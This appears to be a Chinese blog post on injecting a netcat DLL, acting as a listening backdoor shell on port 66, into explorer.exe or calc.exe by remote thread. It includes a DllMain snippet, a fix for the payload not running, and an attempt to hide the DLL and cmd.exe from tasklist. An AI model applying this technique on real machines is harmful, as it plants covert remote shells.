远程线程注入dll的一个例子,nc.dll
说明HideDll.dll既是nc.dll(改了个名,军刀netcat的动态链接库版),相当于nc -LP 66。
loader.exe取自Windows应用程序捆绑核心编程。
也可以用Windows环境下32位汇编语言程序设计RemoteThreadDll中的Load.exe。直接就捆绑到了explorer.exe。
szDesktopClass db 'Progman',0
szDesktopWindow db 'Program Manager',0
环境可以下载上面的masm32 v11,然后下载Windows环境下32位汇编语言程序设计中13章的远程注入dll的例子。
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
{
int id;
switch ( fdwReason )
{
//dll被附加时
case DLL_PROCESS_ATTACH:
glhInstance = hinstDLL;
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EntryPoint,NULL,0,&id);
//EntryPoint (NULL,NULL,NULL,0);
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
开始的时候没有CreateThread(),直接调用了Dll的主函数EntryPoint(),结果注入了dll也没发挥作用。
原来,需要在DllMain()函数里再创建一个线程。
把netcat.dll注入到calc.exe,但是连接后还是出现cmd.exe
http://v.youku.com/v_show/id_XNTU0MzE2ODky.html
能不能把cmd.exe也隐藏了?
tasklistt /m 可以看出所有的进程加载了哪些dll,我们的dll.dll显示了出来!
explorer.exe 3764 ntdll.dll, kernel32.dll, ADVAPI32.dll,
RPCRT4.dll, Secur32.dll, BROWSEUI.dll,
GDI32.dll, USER32.dll, msvcrt.dll,
ole32.dll, SHLWAPI.dll, OLEAUT32.dll,
SHDOCVW.dll, CRYPT32.dll, MSASN1.dll,
CRYPTUI.dll, NETAPI32.dll, VERSION.dll,
WININET.dll, Normaliz.dll, urlmon.dll,
iertutil.dll, WINTRUST.dll, IMAGEHLP.dll,
WLDAP32.dll, SHELL32.dll, UxTheme.dll,
ShimEng.dll, AcGenral.DLL, WINMM.dll,
MSACM32.dll, USERENV.dll, IMM32.DLL,
LPK.DLL, USP10.dll, comctl32.dll,
comctl32.dll, msctfime.ime,
GOOGLEPINYIN2.IME, MSIMG32.dll, gdiplus.dll,
dbghelp.dll, appHelp.dll, CLBCATQ.DLL,
COMRes.dll, NetdiskExt.dll, MPR.dll,
PSAPI.DLL, 360UDiskGuard.dll, SETUPAPI.dll,
cscui.dll, CSCDLL.dll, themeui.dll,
xpsp2res.dll, msxml3.dll, ACTXPRXY.DLL,
SAMLIB.dll, msi.dll, LINKINFO.dll,
ntshrui.dll, ATL.DLL, ieframe.dll,
stobject.dll, BatMeter.dll, POWRPROF.dll,
&nb
补充:综合编程 , 其他综合 ,
